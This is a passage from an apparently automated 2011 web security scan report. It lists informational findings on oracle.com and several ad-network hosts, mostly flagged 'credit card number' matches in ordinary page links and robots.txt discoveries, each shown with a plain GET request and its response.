Date: Tue, 06 Sep 2011 16:16:25 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 131951

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.115. http://www.oracle.com/us/solutions/corporate-governance/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/corporate-governance/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/solutions/corporate-governance/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=208;ecid=41168861828840303,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 161084

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.116. http://www.oracle.com/us/solutions/datawarehousing/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/datawarehousing/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/solutions/datawarehousing/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35744124860188436,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 153925

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.117. http://www.oracle.com/us/solutions/ent-performance-bi/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/ent-performance-bi/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/solutions/ent-performance-bi/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41120169783617619,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 145091

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.118. http://www.oracle.com/us/solutions/midsize/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/midsize/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/solutions/midsize/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41183804020059007,0:1)
Date: Tue, 06 Sep 2011 16:16:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 141597

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.119. http://www.oracle.com/us/solutions/performance-scalability/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/performance-scalability/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/solutions/performance-scalability/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011151567188407,0:1)
Date: Tue, 06 Sep 2011 16:16:29 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 127383

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.120. http://www.oracle.com/us/solutions/solutions-165852.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/solutions/solutions-165852.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/solutions/solutions-165852.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=1;ecid=36011228876600791,0:1)
Date: Tue, 06 Sep 2011 16:16:30 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 129448

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">


<html>
<head><meta http-equiv="Content-Type" content="text/html; charset
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.121. http://www.oracle.com/us/sun/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/sun/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/sun/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=242;ecid=35989165629261333,0:1)
Date: Tue, 06 Sep 2011 16:16:54 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 135893

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.122. http://www.oracle.com/us/support/advanced-customer-services/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/advanced-customer-services/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/advanced-customer-services/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=41102401504905518,0:1)
Date: Tue, 06 Sep 2011 16:16:35 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 133863

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.123. http://www.oracle.com/us/support/contact-068555.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/contact-068555.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/contact-068555.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TG;max-age=300+0;age=0;ecid=40983856110748860,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 177425

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.124. http://www.oracle.com/us/support/development-tools-080025.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/development-tools-080025.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/development-tools-080025.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41102547533795861,0:1)
Date: Tue, 06 Sep 2011 16:16:37 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 124226

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.125. http://www.oracle.com/us/support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35974919222520039,0:1)
Date: Tue, 06 Sep 2011 16:16:32 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140526

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.126. http://www.oracle.com/us/support/lifetime-support/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/lifetime-support/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/lifetime-support/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=41169372929955248,0:1)
Date: Tue, 06 Sep 2011 16:16:38 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123694

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.127. http://www.oracle.com/us/support/oracle-support-services-359636.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/oracle-support-services-359636.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/oracle-support-services-359636.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35762000514351306,0:1)
Date: Tue, 06 Sep 2011 16:16:33 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 122728

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.128. http://www.oracle.com/us/support/policies/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/policies/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/policies/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41102757987196022,0:1)
Date: Tue, 06 Sep 2011 16:16:39 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 134973

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.129. http://www.oracle.com/us/support/premier/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/premier/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/premier/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011538114250090,0:1)
Date: Tue, 06 Sep 2011 16:16:34 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 125918

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.130. http://www.oracle.com/us/support/support-integration/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/support/support-integration/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/support/support-integration/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=36011692733074750,0:1)
Date: Tue, 06 Sep 2011 16:16:36 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 123397

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.131. http://www.oracle.com/us/syndication/subscribe/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/syndication/subscribe/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/syndication/subscribe/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=35763563882469969,0:1)
Date: Tue, 06 Sep 2011 16:16:55 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 132305

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.132. http://www.oracle.com/us/technologies/cloud/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/technologies/cloud/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/technologies/cloud/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=0;ecid=41166220423677124,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 139881

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.133. http://www.oracle.com/us/technologies/java/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/technologies/java/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/technologies/java/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=225;ecid=35761918909971729,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 140103

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.134. http://www.oracle.com/us/technologies/virtualization/index.html

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracle.com
Path:   /us/technologies/virtualization/index.html

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/technologies/virtualization/index.html HTTP/1.1
Host: www.oracle.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TM;max-age=300+0;age=1;ecid=35997532225678913,0:1)
Date: Tue, 06 Sep 2011 16:16:31 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 144444

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

25.135. http://www.oracleimg.com/us/assets/metrics/crossdomain.xml

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.oracleimg.com
Path:   /us/assets/metrics/crossdomain.xml

Issue detail

The following credit card number was disclosed in the response:

Request

GET /us/assets/metrics/crossdomain.xml HTTP/1.1
Host: www.oracleimg.com
Proxy-Connection: keep-alive
Referer: http://c.brightcove.com/services/viewer/federated_f9?isVid=1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Oracle-Application-Server-11g Oracle-Web-Cache-11g/11.1.1.3.0 (TH;max-age=300+0;age=23;ecid=41045686459875265,0:1)
Content-Length: 101820
Vary: Accept-Encoding
Date: Tue, 06 Sep 2011 16:12:59 GMT
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html>
<head><meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
<a href="http://apex.oracle.com/pls/apex/f?p=44785:1:4449012242288468" onclick="navTrack('ocom','en','hnav','oracletechnologynetwork:otntutorials');">
...[SNIP]...

26. Robots.txt file
There are 130 instances of this issue:

Issue background

The file robots.txt is used to give instructions to web robots, such as search engine crawlers, about locations within the web site which robots are allowed, or not allowed, to crawl and index.

The presence of the robots.txt does not in itself present any kind of security vulnerability. However, it is often used to identify restricted or private areas of a site's contents. The information in the file may therefore help an attacker to map out the site's contents, especially if some of the locations identified are not linked from elsewhere in the site. If the application relies on robots.txt to protect access to these areas, and does not enforce proper access control over them, then this presents a serious vulnerability.

Issue remediation

The robots.txt file is not itself a security threat, and its correct use can represent good practice for non-security reasons. You should not assume that all web robots will honour the file's instructions. Rather, assume that attackers will pay close attention to any locations identified in the file. Do not rely on robots.txt to provide any kind of protection over unauthorised access.


26.1. http://1215.ic-live.com/goat.php

Summary

Severity:   Information
Confidence:   Certain
Host:   http://1215.ic-live.com
Path:   /goat.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 1215.ic-live.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 16:45:48 GMT
Server: Apache
Last-Modified: Mon, 08 Aug 2011 18:08:46 GMT
ETag: "87845a-72f-4aa0256936780"
Accept-Ranges: bytes
Content-Length: 1839
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM", policyref="/w3c/p3p.xml"
Content-Type: text/plain
X-Cache: MISS from i2a-coll-6
X-Cache-Lookup: MISS from i2a-coll-6:80
Via: 1.0 i2a-coll-6:80 (squid/2.6.STABLE21)
Connection: close

...User-agent: *
Disallow: /allCountryCodes.txt
Disallow: /altidconv.php
Disallow: /backup/
Disallow: /bugs-dec16.tar
Disallow: /cgi-bin/
Disallow: /checktime.php
Disallow: /client-kit/
Disallow: /com
...[SNIP]...

26.2. http://4qinvite.4q.iperceptions.com/1.aspx

Summary

Severity:   Information
Confidence:   Certain
Host:   http://4qinvite.4q.iperceptions.com
Path:   /1.aspx

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 4qinvite.4q.iperceptions.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Wed, 27 Feb 2008 16:52:38 GMT
Accept-Ranges: bytes
ETag: "b1c52f296179c81:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
X-Srv-By: IPS-INVITE01
P3P: policyref="/w3c/p3p.xml", CP="NOI NID ADM DEV PSA OUR IND UNI COM STA"
Date: Tue, 06 Sep 2011 16:08:50 GMT
Connection: close
Content-Length: 26

User-agent: *
Disallow: /

26.3. http://904-kuw-942.mktoresp.com/webevents/visitWebPage

Summary

Severity:   Information
Confidence:   Certain
Host:   http://904-kuw-942.mktoresp.com
Path:   /webevents/visitWebPage

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: 904-kuw-942.mktoresp.com

Response

HTTP/1.1 200 OK
Date: Tue, 06 Sep 2011 15:32:31 GMT
Server: Apache
Last-Modified: Fri, 08 Jul 2011 02:03:21 GMT
ETag: "9021f4-18-4a7853ce56c40"
Accept-Ranges: bytes
Content-Length: 24
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

26.4. http://a.tribalfusion.com/displayAd.js

Summary

Severity:   Information
Confidence:   Certain
Host:   http://a.tribalfusion.com
Path:   /displayAd.js

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: a.tribalfusion.com

Response

HTTP/1.0 200 OK
P3P: CP="NOI DEVo TAIa OUR BUS"
X-Function: 305
X-Reuse-Index: 1
Content-Type: text/plain
Content-Length: 26
Connection: Close

User-agent: *
Disallow: /

26.5. http://ad.doubleclick.net/adj/nbcu.cnbc/search

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.doubleclick.net
Path:   /adj/nbcu.cnbc/search

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.doubleclick.net

Response

HTTP/1.0 200 OK
Server: DCLK-HttpSvr
Content-Type: text/plain
Content-Length: 101
Last-Modified: Thu, 18 Mar 2010 15:31:04 GMT
Date: Tue, 06 Sep 2011 17:05:42 GMT

User-Agent: AdsBot-Google
Disallow:

User-Agent: MSNPTC
Disallow:

User-agent: *
Disallow: /

26.6. http://ad.yieldmanager.com/pixel

Summary

Severity:   Information
Confidence:   Certain
Host:   http://ad.yieldmanager.com
Path:   /pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: ad.yieldmanager.com

Response

HTTP/1.0 200 OK
Date: Tue, 06 Sep 2011 15:32:13 GMT
Server: YTS/1.18.4
P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR NID CURa ADMa DEVa PSAa PSDa OUR BUS COM INT OTC PUR STA"
Cache-Control: no-store
Last-Modified: Tue, 06 Sep 2011 15:32:13 GMT
Pragma: no-cache
Content-Length: 26
